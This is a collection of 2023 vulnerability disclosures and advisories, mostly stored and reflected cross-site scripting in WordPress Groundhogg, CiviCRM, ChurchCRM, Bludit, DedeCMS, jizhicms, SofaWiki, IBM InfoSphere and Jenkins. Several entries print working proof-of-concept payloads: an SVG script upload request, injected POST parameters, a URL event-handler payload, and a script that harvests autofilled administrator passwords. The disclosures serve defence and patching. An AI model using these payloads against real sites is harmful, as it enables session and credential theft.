The Groundhogg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gh_form' shortcode in versions up to, and including, 2.7.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note this only works with legacy contact forms.

Timestamp:

05/18/2023 09:11:58 PM (31 hours ago)

trainingbusinesspros

Message:

Update to version 2.7.10 from GitHub  

File:

  

*   groundhogg/trunk/includes/better-meta-compat.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **groundhogg/trunk/includes/better-meta-compat.php**
    
    r2905793
    
    r2914493
    
     
    
    87
    
    87
    
        $data = $contact->get\_meta( $field\['name'\] );
    
    88
    
    88
    
    89
    
     
    
        switch ( $field\['type'\] ):
    
    90
    
     
    
            default:
    
    91
    
     
    
            case 'text':
    
    92
    
     
    
            case 'custom\_email':
    
    93
    
     
    
            case 'email':
    
    94
    
     
    
            case 'url':
    
    95
    
     
    
            case 'tel':
    
    96
    
     
    
            case 'radio':
    
    97
    
     
    
            case 'textarea':
    
    98
    
     
    
                $data = esc\_html( $data );
    
    99
    
     
    
                break;
    
    100
    
     
    
            case 'datetime':
    
    101
    
     
    
                $data = date\_i18n( get\_date\_time\_format(), strtotime( $data ) );
    
    102
    
     
    
                break;
    
    103
    
     
    
            case 'time':
    
    104
    
     
    
                $data = date\_i18n( get\_time\_format(), strtotime( $data ) );
    
    105
    
     
    
                break;
    
    106
    
     
    
            case 'date':
    
    107
    
     
    
                $data = date\_i18n( get\_option( 'date\_format' ), strtotime( $data ) );
    
    108
    
     
    
                break;
    
    109
    
     
    
            case 'number':
    
    110
    
     
    
                $data = floatval( $data );
    
    111
    
     
    
                $data = number\_format\_i18n( $data, floor( $data ) != $data ? 2 : 0 );
    
    112
    
     
    
                break;
    
    113
    
     
    
            case 'dropdown':
    
    114
    
     
    
            case 'checkboxes':
    
    115
    
     
    
                if ( is\_array( $data ) ) {
    
    116
    
     
    
                    $data = esc\_html( implode( ', ', $data ) );
    
    117
    
     
    
                } else {
    
     
    
    89
    
        if ( ! empty( $data ) ){
    
     
    
    90
    
            switch ( $field\['type'\] ):
    
     
    
    91
    
                default:
    
     
    
    92
    
                case 'text':
    
     
    
    93
    
                case 'custom\_email':
    
     
    
    94
    
                case 'email':
    
     
    
    95
    
                case 'url':
    
     
    
    96
    
                case 'tel':
    
     
    
    97
    
                case 'radio':
    
     
    
    98
    
                case 'textarea':
    
    118
    
    99
    
                    $data = esc\_html( $data );
    
    119
    
     
    
                }
    
    120
    
     
    
                break;
    
    121
    
     
    
            case 'html':
    
    122
    
     
    
                // output with no change as already HTML
    
    123
    
     
    
                break;
    
    124
    
     
    
        endswitch;
    
     
    
    100
    
                    break;
    
     
    
    101
    
                case 'datetime':
    
     
    
    102
    
                    $data = date\_i18n( get\_date\_time\_format(), strtotime( $data ) );
    
     
    
    103
    
                    break;
    
     
    
    104
    
                case 'time':
    
     
    
    105
    
                    $data = date\_i18n( get\_time\_format(), strtotime( $data ) );
    
     
    
    106
    
                    break;
    
     
    
    107
    
                case 'date':
    
     
    
    108
    
                    $data = date\_i18n( get\_option( 'date\_format' ), strtotime( $data ) );
    
     
    
    109
    
                    break;
    
     
    
    110
    
                case 'number':
    
     
    
    111
    
                    $data = floatval( $data );
    
     
    
    112
    
                    $data = number\_format\_i18n( $data, floor( $data ) != $data ? 2 : 0 );
    
     
    
    113
    
                    break;
    
     
    
    114
    
                case 'dropdown':
    
     
    
    115
    
                case 'checkboxes':
    
     
    
    116
    
                    if ( is\_array( $data ) ) {
    
     
    
    117
    
                        $data = esc\_html( implode( ', ', $data ) );
    
     
    
    118
    
                    } else {
    
     
    
    119
    
                        $data = esc\_html( $data );
    
     
    
    120
    
                    }
    
     
    
    121
    
                    break;
    
     
    
    122
    
                case 'html':
    
     
    
    123
    
                    // output with no change as already HTML
    
     
    
    124
    
                    break;
    
     
    
    125
    
            endswitch;
    
     
    
    126
    
        }
    
     
    
    127
    
     
    
    128
    
        /\*\*
    
     
    
    129
    
         \* Filter the display value of a custom field
    
     
    
    130
    
         \*
    
     
    
    131
    
         \* @param $data mixed the custom field display value
    
     
    
    132
    
         \* @param $contact Contact
    
     
    
    133
    
         \*/
    
     
    
    134
    
        $data = apply\_filters( 'groundhogg/display\_custom\_field', $data, $contact );
    
    125
    
    135
    
    126
    
    136
    
        if ( $echo ) {
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-2735: Changeset 2914493 for groundhogg/trunk/includes/better-meta-compat.php – WordPress Plugin Repository

A vulnerability classified as problematic has been found in SourceCodester Class Scheduling System 1.0. Affected is an unknown function of the file /admin/save_teacher.php of the component POST Parameter Handler. The manipulation of the argument Academic_Rank leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229428.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-2814: bugReport/XSS.md at main · jiy2020/bugReport

IBM InfoSphere Information Server 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  251213.

  

**Summary**

A stored cross-site scripting vulnerability in InfoSphere Information Server was addressed.

**Vulnerability Details**

**CVEID:**   CVE-2023-28529  
**DESCRIPTION:**   IBM InfoSphere Information Server is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/251213 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

InfoSphere Information Server

11.7

**Remediation/Fixes**

**Product**

**VRMF**

**APAR**

**Remediation**

InfoSphere Information Server, InfoSphere Information Server on Cloud

11.7

DT197304

\--Apply IBM InfoSphere Information Server version 11.7.1.0  
\--Apply InfoSphere Information Server version 11.7.1.4  
\--Apply InfoSphere Information Server  11.7.1.4 Service pack 1

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

17 May 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSZJPZ","label":"IBM InfoSphere Information Server"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"}\],"Version":"11.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-28529: Security Bulletin: IBM InfoSphere Information Server is vulnerable to stored cross-site scripting (CVE-2023-28529)

CiviCRM version 5.59.alpha1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)# Date: 2023-02-02# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://civicrm.org# Software Link: https://civicrm.org/download# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)# CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05Description:A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary webscripts or HTML.Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second namefield, it will be triggered once page gets loaded.Steps to reproduce:- Quick Add contact to CiviCRM,- Insert a payload PoC inside the field(s)- Click on 'Add contact'.If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.Timeline:2023-01-29: Vulnerability discovered2023-02-02: Request for CVE reservation2023-02-04: Vendor contacted2023-02-06: Vendor replies, acknowledgments and coordinating for advisory2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-052023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget2023-04-27: Assigned CVE number: CVE-2023-254402023-05-18: CVE publication / disclosure

CiviCRM 5.59.alpha1 Cross Site Scripting

ChurchCRM version 4.5.4 suffers from a cross site scripting vulnerability. Related CVE number: CVE-2023-31699.

    # Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)# Date: 2023-04-17# Exploit Author: Rahad Chowdhury# Vendor Homepage: http://churchcrm.io/# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4# Version: 4.5.4# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31699Steps to Reproduce:1. At first login your admin panel.2. Then click "Admin" menu and click "CSV Import" and you will get CSV fileuploder option.3. now insert xss payload in jpg file using exiftool or from imageproperties and then upload the jpg file.4. you will see XSS pop up.

ChurchCRM 4.5.4 Cross Site Scripting

Bludit CMS version 3.14.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)(Authenticated)# Date: 2023-04-15# Exploit Author: Rahad Chowdhury# Vendor Homepage: https://www.bludit.com/# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1# Version: 3.14.1# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31698SVG Payload-------------<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>save this SVG file xss.svgSteps to Reproduce:1. At first login your admin panel.2. then go to setting and click logo section.3. Now upload xss.svg file so your request data will bePOST /bludit/admin/ajax/logo-upload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/112.0Content-Type: multipart/form-data;boundary=---------------------------15560729415644048492005010998Referer: http://127.0.0.1/bludit/admin/settingsCookie: BLUDITREMEMBERUSERNAME=admin;BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74iContent-Length: 651-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="tokenCSRF"626c201693546f472cdfc11bed0938aab8c6e480-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="inputFile"; filename="xss.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>-----------------------------15560729415644048492005010998--4. Now open logo image link that you upload. You will see XSS pop up.

Bludit CMS 3.14.1 Cross Site Scripting

Red Hat Security Advisory 2023-3195-01 - Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron. Issues addressed include bypass, cross site scripting, information leakage, and insecure permissions vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: jenkins and jenkins-2-plugins security update  
Advisory ID:       RHSA-2023:3195-01  
Product:           OpenShift Developer Tools and Services  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3195  
Issue date:        2023-05-17  
CVE Names:         CVE-2022-42889 CVE-2023-24422 CVE-2023-25761   
                   CVE-2023-25762 CVE-2023-27903 CVE-2023-27904   
=====================================================================

1. Summary:

An update for jenkins and jenkins-2-plugins is now available for OpenShift  
Developer Tools and Services for OCP 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

OpenShift Developer Tools and Services for OCP 4.12 for RHEL 8 - noarch

3. Description:

Jenkins is a continuous integration server that monitors executions of  
repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script  
Security Plugin (CVE-2023-24422)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin  
(CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in  
Pipeline: Build Step Plugin (CVE-2023-25762)

* Jenkins: Temporary file parameter created with insecure permissions  
(CVE-2023-27903)

* Jenkins: Information disclosure through error stack traces related to  
agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2164278 - CVE-2023-24422 jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin  
2170039 - CVE-2023-25761 jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin  
2170041 - CVE-2023-25762 jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin  
2177632 - CVE-2023-27903 Jenkins: Temporary file parameter created with insecure permissions  
2177634 - CVE-2023-27904 Jenkins: Information disclosure through error stack traces related to agents

6. Package List:

OpenShift Developer Tools and Services for OCP 4.12 for RHEL 8:

Source:  
jenkins-2-plugins-4.12.1683009955-1.el8.src.rpm  
jenkins-2.387.1.1683009767-3.el8.src.rpm

noarch:  
jenkins-2-plugins-4.12.1683009955-1.el8.noarch.rpm  
jenkins-2.387.1.1683009767-3.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/cve/CVE-2023-24422  
https://access.redhat.com/security/cve/CVE-2023-25761  
https://access.redhat.com/security/cve/CVE-2023-25762  
https://access.redhat.com/security/cve/CVE-2023-27903  
https://access.redhat.com/security/cve/CVE-2023-27904  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.12/cicd/jenkins/important-changes-to-openshift-jenkins-images.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGa58dzjgjWX9erEAQip9w//UBL/dt2vE4XpmSQJfp6gkUvPQjdbUAmH  
nuozjZ+73t1bqA98GRVo6zpccPHTpzoN43SMYTcWbl49MAuSrSAXNTYO5L1RO97w  
B0RffO+yyfejfXnt/QsJzvCWEKWuICrOVzEry3iDpWjwU2tZT8K6cS/JeE0JuyDp  
OoZDHq2t7ke0Ew/tqiXXlafPI43ZSz93GdJ66bGXCmeCAFxOLj1V5Otn4j88RPVg  
PVgdcUGH4kCT0k0DN43gPN60hNRQh32Y9D6TKtgC/8AwJp3Vv+qOSM5rhCsLzh24  
dpZHwGKGUARP976MNxmcwea74CYnhnjwZhUgQTCsTpPF3iMxw23Lv7W4M454DsSR  
qEiGqjY1RXM9iz6Cd05HCFS8UdWN46T2f02IEjOWpFDLqYueP8AtngWVBlHhZIq6  
1P1/MqTAXrQ2DXL2JooBkyK3LSOkN0HVebSw4mIEitmgEM5wcgskJOYC/y9+fUxb  
38SJQF/hqpZrl+uuQD7bZYnQrzHf9wHJq7wMOsTGHcc1pdPKY6TEV2H0QHb45uNS  
mn3uEzPKjJ0qU3IBOFKm4aoaC+cJ1WynZdlDwhAEwMU3PxtcSpEZCUS1d1omgBvd  
fssRVi6M0wQWgyorIiCSfgiwt7mkt0w+49DhkwiFzmdEPPT6lwzAAm/Up/nwmJuB  
p+xANTbizJ0=  
=8o2E  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3195-01

DedeCMS up to v5.7.108 is vulnerable to XSS in sys_info.php via parameters 'edit___cfg_powerby' and 'edit___cfg_beian'

Permalink

DedeCMS up to V5.7.108 XSS vulnerability The vulnerable file is sys\_info.php and the vulnerable parameter is 'edit\_\_\_cfg\_powerby' and 'edit\_\_\_cfg\_beian'

POC below:

    POST /dedecms/uploads/dede/sys_info.php HTTP/1.1
    ******************************************************
    
    token=23aada1a3ad5a8dc6de2cecbf03c8e5e&dopost=save&edit___cfg_basehost=http%3A%2F%2F8.38.80.109&edit___cfg_indexurl=%2Fdedecms%2Fuploads&edit___cfg_indexname=%E4%B8%BB%E9%A1%B5&edit___cfg_webname=%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99&edit___cfg_arcdir=%2Fa&edit___cfg_medias_dir=%2Fuploads&edit___cfg_fck_xhtml=N&edit___cfg_df_style=default&edit___cfg_powerby=Copyright+%26copy%3B+2007-2021+%E4%B8%8A%E6%B5%B7%E5%8D%93%E5%8D%93%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%0D%0A%3Cscript%3Ealert%28%27xss+again+hahaha%27%29%3C%2Fscript%3E&edit___cfg_keywords=&edit___cfg_description=&edit___cfg_beian=%3Cimg+src%3D1+onerror%3Dalert%28document.cookie%29%3E&edit___cfg_cmspath=%2Fdedecms%2Fuploads&edit___cfg_cookie_encode=C803vUgcGAwTNye55G9i8UwpXIMXNQ4&edit___cfg_backup_dir=backupdata&edit___cfg_adminemail=admin%40dedecms.com&edit___cfg_html_editor=wangEditor&edit___cfg_domain_cookie=&edit___cfg_specnote=6&edit___cfg_list_symbol=+%3E+&edit___cfg_keyword_replace=Y&edit___cfg_multi_site=N&edit___cfg_dede_log=N&edit___cfg_ftp_host=&edit___cfg_ftp_port=21&edit___cfg_ftp_user=&edit___cfg_ftp_pwd=&edit___cfg_ftp_root=%2F&edit___cfg_ftp_mkdir=N&edit___cfg_cli_time=8&edit___cfg_sendmail_bysmtp=Y&edit___cfg_smtp_server=smtp.qq.com&edit___cfg_smtp_port=25&edit___cfg_smtp_usermail=desdev%40vip.qq.com&edit___cfg_smtp_user=desdev&edit___cfg_smtp_password=desdev&edit___cfg_online_type=nps&edit___cfg_upload_switch=Y&edit___cfg_allsearch_limit=1&edit___cfg_rewrite=N&edit___cfg_delete=Y&edit___cfg_typedir_df=Y&edit___cfg_remote_site=N&edit___cfg_title_site=N&edit___cfg_mysql_type=mysql&edit___cfg_timeout_exit=1800&edit___cfg_archives_log=N&edit___cfg_fail_limit=5&edit___cfg_lock_time=3600&edit___cfg_ddimg_width=240&edit___cfg_ddimg_height=180&edit___cfg_imgtype=jpg%7Cgif%7Cpng&edit___cfg_softtype=zip%7Cgz%7Crar%7Ciso%7Cdoc%7Cxsl%7Cppt%7Cwps&edit___cfg_mediatype=swf%7Cmpg%7Cmp3%7Cmp4%7Crm%7Crmvb%7Cwmv%7Cwma%7Cwav%7Cmid%7Cmov&edit___cfg_album_width=800&edit___cfg_album_row=3&edit___cfg_album_col=4&edit___cfg_album_pagesize=12&edit___cfg_album_style=2&edit___cfg_album_ddwidth=200&edit___cfg_max_face=50&edit___cfg_addon_savetype=ymd&edit___cfg_qk_uploadlit=Y&edit___cfg_ddimg_full=N&edit___cfg_ddimg_bgcolor=0&edit___cfg_uplitpic_cut=Y&edit___cfg_album_mark=N&edit___cfg_mb_open=N&edit___cfg_mb_album=Y&edit___cfg_mb_upload=Y&edit___cfg_mb_upload_size=1024&edit___cfg_mb_sendall=Y&edit___cfg_mb_rmdown=Y&edit___cfg_mb_addontype=swf%7Cmpg%7Cmp3%7Cmp4%7Crm%7Crmvb%7Cwmv%7Cwma%7Cwav%7Cmid%7Cmov%7Czip%7Crar%7Cdoc%7Cxsl%7Cppt%7Cwps&edit___cfg_mb_max=500&edit___cfg_mb_notallow=www%2Cbbs%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&edit___cfg_mb_idmin=3&edit___cfg_mb_pwdmin=3&edit___cfg_mb_pwdtype=32&edit___cfg_md_idurl=N&edit___cfg_mb_rank=10&edit___cfg_md_mailtest=N&edit___cfg_mb_spacesta=-10&edit___cfg_mb_allowncarc=Y&edit___cfg_mb_allowreg=Y&edit___cfg_mb_adminlock=N&edit___cfg_mb_spaceallarc=0&edit___cfg_mb_wnameone=N&edit___cfg_mb_feedcheck=N&edit___cfg_mb_msgischeck=N&edit___cfg_mb_reginfo=Y&edit___cfg_notallowstr=%E9%9D%9E%E5%85%B8%7C%E8%89%BE%E6%BB%8B%E7%97%85%7C%E9%98%B3%E7%97%BF&edit___cfg_replacestr=%E5%A5%B9%E5%A6%88%7C%E5%AE%83%E5%A6%88%7C%E4%BB%96%E5%A6%88%7C%E4%BD%A0%E5%A6%88%7C%E5%8E%BB%E6%AD%BB%7C%E8%B4%B1%E4%BA%BA&edit___cfg_feedbackcheck=N&edit___cfg_feedback_ck=Y&edit___cfg_feedback_time=30&edit___cfg_feedback_numip=30&edit___cfg_vdcode_member=Y&edit___cfg_mb_cktitle=Y&edit___cfg_mb_editday=7&edit___cfg_caicai_sub=2&edit___cfg_caicai_add=2&edit___cfg_feedback_add=5&edit___cfg_feedback_sub=5&edit___cfg_feedback_forbid=N&edit___cfg_sendarc_scores=10&edit___cfg_sendfb_scores=3&edit___cfg_face_adds=10&edit___cfg_moreinfo_adds=20&edit___cfg_money_scores=50&edit___cfg_login_adds=2&edit___cfg_userad_adds=10&edit___cfg_feedback_guest=N&edit___cfg_arcsptitle=N&edit___cfg_arcautosp=N&edit___cfg_arcautosp_size=5&edit___cfg_list_son=Y&edit___cfg_keyword_like=N&edit___cfg_index_max=10000&edit___cfg_index_cache=86400&edit___cfg_tplcache=Y&edit___cfg_tplcache_dir=%2Fdata%2Ftplcache&edit___cfg_makesign_cache=N&edit___cfg_search_max=50000&edit___cfg_search_maxrc=300&edit___cfg_search_time=3&edit___cfg_need_typeid2=Y&edit___cfg_cache_type=id&edit___cfg_makeindex=N&edit___cfg_make_andcat=N&edit___cfg_make_prenext=Y&edit___cfg_puccache_time=36000&edit___cfg_memcache_enable=N&edit___cfg_memcache_mc_defa=memcache%3A%2F%2F127.0.0.1%3A11211%2Fdefault127&edit___cfg_memcache_mc_oth=&edit___cfg_digg_update=0&edit___cfg_disable_funs=phpinfo%2Ceval%2Cassert%2Cexec%2Cpassthru%2Cshell_exec%2Csystem%2Cproc_open%2Cpopen%2Ccurl_exec%2Ccurl_multi_exec%2Cparse_ini_file%2Cshow_source%2Cfile_put_contents%2Cfsockopen%2Cfopen%2Cfwrite%2Cpreg_replace&edit___cfg_disable_tags=php&edit___cfg_auot_description=240&edit___cfg_rm_remote=Y&edit___cfg_arc_dellink=N&edit___cfg_arc_autopic=Y&edit___cfg_arc_autokeyword=Y&edit___cfg_title_maxlen=60&edit___cfg_check_title=Y&edit___cfg_jump_once=Y&edit___cfg_task_pwd=&edit___cfg_addon_domainbind=N&edit___cfg_addon_domain=&edit___cfg_df_dutyadmin=admin&edit___cfg_arc_dirname=Y&edit___cfg_arc_click=-1&edit___cfg_replace_num=2&edit___cfg_replace_total=0&edit___cfg_replace_sort=1&edit___cfg_sphinx_article=N&edit___cfg_sphinx_host=localhost&edit___cfg_sphinx_port=9312&edit___cfg_cross_sectypeid=N&edit___cfg_baidunews_limit=100&edit___cfg_updateperi=15&imageField.x=25&imageField.y=14
    
    

Reproduce:

XSS triggered:

CVE-2023-31757: vul_report/XSS.md at main · sleepyvv/vul_report

jizhicms v2.4.6 is vulnerable to Cross Site Scripting (XSS). The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package.

The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. However, the backend administrator clicking on the article preview will launch this malicious JavaScript script  
  
When submitting, you can see that the post request sent is:  
  
Modify the submitted content to:  
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E  
  
At this point, if the administrator previews the submitted article, a pop-up window will appear  
  
  
At this point, it indicates that the embedded JavaScript script has been maliciously executed  
I know that the entire system's cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser's "automatic password filling" function, then the attacker can construct the following JavaScript script to obtain the administrator's plaintext password:

    <p>test</p>
    <form method="post" class="layui-form" onsubmit="return false;" hidden>
    	<input name="cache" id="cache" type="hidden" value="" />
    	<select name="lang"  lay-filter="lang">
    		<option value="">选择语言</option>
    		<option  selected  value="zh_cn">中文简体</option>
    		<option  value="zh_cht">中文繁体</option>
    
    	</select>
    	<hr class="hr15">
    	<input name="username" placeholder="用户名"  type="text" lay-verify="required" class="layui-input" >
    	<hr class="hr15">
    	<input name="password" lay-verify="required" placeholder="密码"  type="password" class="layui-input">
    	<hr class="hr15">
    	<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
    	<hr class="hr20" >
    </form>
    <script>
    	setTimeout(function() {
    		const password = document.getElementsByName('password')[0].value;
    		alert(`the password is：${password}`);
    	}, 5000);
    </script>
    

Submit the script after URL encoding  
  
Administrator clicks on preview:  
  
Here, the password plaintext has been pop-up displayed through the JavaScript script. If the pop-up function is modified to send the password plaintext to the attacker's server, the attacker will successfully obtain the administrator's plaintext password without the administrator's awareness  
Modification suggestions:  
Please filter the content of the article on the backend

CVE-2023-31862: jizhicms v2.4.6 has a XSS vulnerability  in the post article · Issue #86 · Cherry-toto/jizhicms

SofaWiki <=3.8.9 is vulnerable to Cross Site Scripting (XSS) via index.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Closed

xul18 opened this issue

Mar 15, 2023

· 1 comment

Closed

**\[Vuln\]There is a reflected XSS vulnerability. #26**

xul18 opened this issue

Mar 15, 2023

· 1 comment

**Comments**

Copy link

**

**xul18** commented

Mar 15, 2023

**

1.  The variable name is being sanitized for XSS using the function swSimpleSanitize().

    // index.php
    $name = swGetArrayValue($_REQUEST,'name',$swMainName); 
    $name = swSimpleSanitize($name); // XSS
    

2.  The function swSimpleSanitize() only filters "<" and ">".

    // /inc/utilities.php
    function swSimpleSanitize($s)
    {
    	// filters out XSS input to be used on variables that should not habe html code or exec code
    	$s = str_replace("<","",$s);
    	$s = str_replace(">","",$s);
    	return $s;
    }
    

3.  Use payload to trigger reflected XSS.  
    **http://_._._._/index.php?name=test%22%20onmouseover=alert(/xss/);%22**  
      
    

Copy link

Owner

**

**bellenuit** commented

Mar 15, 2023

**

hotfix 8e1a572

 bellenuit closed this as completed

Mar 15, 2023

 xul18 mentioned this issue

May 18, 2023

XSS xul18/Showcase#1

Closed

Sign up for free **to join this conversation on GitHub**. Already have an account? Sign in to comment

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

No branches or pull requests

2 participants

Tag

#xss